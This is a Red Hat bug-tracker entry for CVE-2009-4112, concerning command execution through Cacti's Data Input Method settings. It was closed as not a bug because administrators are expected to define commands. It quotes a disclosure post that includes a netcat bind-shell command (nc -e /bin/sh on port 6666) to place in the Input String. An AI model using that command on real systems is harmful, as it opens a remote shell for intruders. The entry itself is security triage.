Bug 542985 (CVE-2009-4112)

Summary: CVE-2009-4112 Cacti: Privilege escalation under certain conditions
Product: [Other] Security Response Reporter: Jan Lieskovsky <jlieskov>
Component: vulnerabilityAssignee: Red Hat Product Security <security-response-team>
Status: CLOSED NOTABUG QA Contact:
Severity: low Docs Contact:
Priority: low    
Version: unspecifiedCC: mmcgrath
Target Milestone: ---Keywords: Security
Target Release: ---   
Hardware: All   
OS: Linux   
URL: http://archives.neohapsis.com/archives/fulldisclosure/2009-11/0292.html
Whiteboard:
Fixed In Version: Doc Type: Bug Fix
Doc Text:
Story Points: ---
Clone Of: Environment:
Last Closed: 2010-06-29 08:11:41 UTC Type: ---
Regression: --- Mount Type: ---
Documentation: --- CRM:
Verified Versions: Category: ---
oVirt Team: --- RHEL 7.3 requirements from Atomic Host:
Cloudforms Team: --- Target Upstream Version:
Embargoed:

Description Jan Lieskovsky 2009-12-01 11:54:09 UTC 
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4112
to the following vulnerability:

Cacti 0.8.7e and earlier allows remote authenticated administrators to
gain privileges by modifying the "Data Input Method" for the "Linux -
Get Memory Usage" setting to contain arbitrary commands.

References:
-----------
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4112
http://archives.neohapsis.com/archives/fulldisclosure/2009-11/0292.html
http://www.securityfocus.com/bid/37137

More issue details from the full-disclosure post by Moritz Naumann:
-------------------------------------------------------------------

5. Priviledge escalation

Finally, due to the permissive way the web interface allows
Cacti to be configured, a cacti administrator is also able
to execute arbitrary commands on the system as the user the
Cacti polling mechanism runs as (usually a non-priviledged user).

For example, it is possible to successfully spawn (and connect to)
a backdoor/remote shell on the Cacti system by changing the "Data
Input Method" for "Linux - Get Memory Usage". Setting "Input String"
to 
  nohup nc -l -p 6666 -n -e /bin/sh &

would spawn a remotely accessible shell whenever this handler was
called (every couple of minutes by default on my Debian test system).

Cacti developers say:
> There is no effective way to fix the data input method without
> breaking Cacti. It will be reviewed for the release of 0.8.8.

Upstream patch:
---------------
No upstream patch yet.
Comment 1 Mike McGrath 2009-12-02 18:20:28 UTC 
what version of nc has a valid -e?
Comment 2 Tomas Hoger 2010-06-29 08:11:41 UTC 
(In reply to comment #1)
> what version of nc has a valid -e?    

Some Debian version, or nmap's netcat implementation - ncat.

However, I'm closing this bug.  It is expected that cacti administrator is able to define new Data Input Methods that can be either SNMP query or command that is run with privileges of cacti user.  So this "flaw" does not bypass any intended restriction.  It seems upstream has no intention to add additional restrictions on Data Input Methods commands in the maintenance releases for current cacti version.